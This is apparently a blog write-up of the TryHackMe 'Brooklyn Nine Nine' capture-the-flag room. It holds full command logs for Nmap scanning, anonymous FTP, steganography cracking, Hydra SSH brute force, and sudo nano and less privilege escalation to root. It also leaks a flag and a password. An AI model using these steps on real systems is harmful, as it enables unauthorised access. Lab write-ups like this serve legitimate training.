Brooklyn Nine-Nine — TryHackMe WriteUp

This room Brooklyn Nine Nine from TryHackMe is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box. I’ll use both steps to pwn this machine. The task given is Deploy and get hacking. So let’s get to it:-

FIRST STEP

Started Nmap Scan

└─$ nmap --min-rate 1000 -p- 10.10.132.150  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:26 EAT
Nmap scan report for 10.10.132.150
Host is up (0.32s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 116.95 seconds

So next I got into service scan for the ports found open. (I used aggressive scan)

└─$ nmap -A -p21,22,80 10.10.132.150        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:30 EAT
Nmap scan report for 10.10.132.150
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.35.209
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds

So I got into enumerating the services available in the ports

FTP (Port 21)

I started by logging in anonymously as we are told from the scan results (Anonymous FTP login allowed (FTP code 230)). I managed to log in and found a txt file. So I downloaded it to my local machine

└─$ ftp 10.10.132.150
Connected to 10.10.132.150.
220 (vsFTPd 3.0.3)
Name (10.10.132.150:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26747|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> mget note_to_jake.txt 
mget note_to_jake.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||26030|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |***********************************************************************************************************************************************************************************************|   119        1.34 KiB/s    00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (0.30 KiB/s)

On viewing the contents of the txt file we get

└─$ cat note_to_jake.txt 
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

HTTP (Port 80)

I accessed the IP via browser

I viewed the page source and I found a hint left as a comment (<! — Have you ever heard of steganography? -→). I downloaded the image to my local machine

I started running tools on the image first to find information. I discovered it required a passphrase. So I used stegcrack to brute force and find the password. I found a password admin.

I used steghide to extract data from the image and found a txt file ‘note.txt’

└─$ steghide info brooklyn99.jpg                 
"brooklyn99.jpg":
  format: jpeg
  capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: can not uncompress data. compressed data is corrupted.
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Downloads/THM/Brooklyn99]
└─$ stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20395 passwords
Your file has been written to: brooklyn99.jpg.out
admin
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Downloads/THM/Brooklyn99]
└─$ steghide --extract -sf brooklyn99.jpg                      
Enter passphrase: 
wrote extracted data to "note.txt".

On accessing the the txt file I found Holt’s password (fluffydog12@ninenine)

└─$ cat note.txt 
Holts Password:
{REDACTED}

Enjoy!!

We had an SSH port open. I tried using the credentials I found to try see if we can exploit that and we were successful

└─$ ssh holt@10.10.132.150 
holt@10.10.132.150's password: 
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18

So I look around for any available files and I found user.txt. It’s contents (REDACTED) which was our user flag

holt@brookly_nine_nine:~$ ls
nano.save  user.txt
holt@brookly_nine_nine:~$ cat user.txt 
{REDACTED}
holt@brookly_nine_nine:~$

Next was to find a way to escalate our privileges to the root level

There was another file to together with user.txt file ‘nano.save’. I tried viewing it’s contents but failed due to lack of permissions.

holt@brookly_nine_nine:~$ cat nano.save 
cat: nano.save: Permission denied

I tried to see the sudo capabilities of this user and got lucky enough to find commands Holt can run

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

So I opted to use GTFObins to get shell by exploiting nano. I searched for nano and got.

So went to the first command available

So we need run the nano file as sudo

sudo /bin/nano

We then run CTRL R the CTRL X

It gives as an option to add the command to execute

So I input the command below on it and press enter then wait

reset; sh 1>&0 2>&0

It gives me access to root.

# whoami                                               
root

So I look around for the flag and found it

# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: {REDACTED}

Enjoy!!
#

SECOND STEP

Started Nmap scan. There are 3 open ports.

└─$ nmap 10.10.113.99                                         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:54 EAT
Nmap scan report for 10.10.113.99
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
80/tcp   open     http
9102/tcp filtered jetdirect

Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds

I ran a service scan so I went for the -A (aggressive scan)

└─$ nmap -p21,22,80 -A 10.10.113.99         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:57 EAT
Nmap scan report for 10.10.113.99
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.35.209
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

I start enumerating each port starting with➖

FTP (Port 22)

From the default script on port 22 we are told that anonymous:anonymous login is allowed, so we start with that.

I successfully login then I file a .txt file (note_to_jake).

└─$ ftp 10.10.113.99 
Connected to 10.10.113.99.
220 (vsFTPd 3.0.3)
Name (10.10.113.99:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7166|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> mget note_to_jake.txt
mget note_to_jake.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||64387|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |***********************************************************************|   119       47.90 KiB/s    00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (0.38 KiB/s)
ftp>

I download the file to my local machine to view it’s contents

└─$ cat note_to_jake.txt 
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

From this we get that, Jake is being told to change the password. So I use that as my username to bruteforce to get a password. I’ll be using Hydra for this. I successfully get the password. (For machines I’d advise to use small letters for the name you find)

└─$ hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.113.99 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-17 12:13:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.113.99:22/
[22][ssh] host: 10.10.113.99   login: jake   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-17 12:14:18

I login via ssh using the credentials. I get to the home directory. Where I find 3 other directories with the usernames we had. Checking on each I get successful with the holt directory. Where I find the user.txt which is our flag

└─$ ssh jake@10.10.113.99
jake@10.10.113.99's password: 
Last login: Thu Aug 17 09:17:39 2023 from 10.8.35.209
jake@brookly_nine_nine:~$ cd /home/
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ cd holt/
jake@brookly_nine_nine:/home/holt$ ls
nano.save  user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt 
(ee11cbb19052e40b07aac0ca060c23ee)
jake@brookly_nine_nine:/home/holt$

I now want to escalate privileges, I run the sudo -l command. I find a command jake may run as SUDO

jake@brookly_nine_nine:/home/holt$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
jake@brookly_nine_nine:/home/holt$

So I run the command given as sudo

sudo /usr/bin/less /root/root.txt

I find

-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: (REDACTED)

Enjoy!!

About the author

Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.

Follow me on:

Twitter, LinkedIn, Github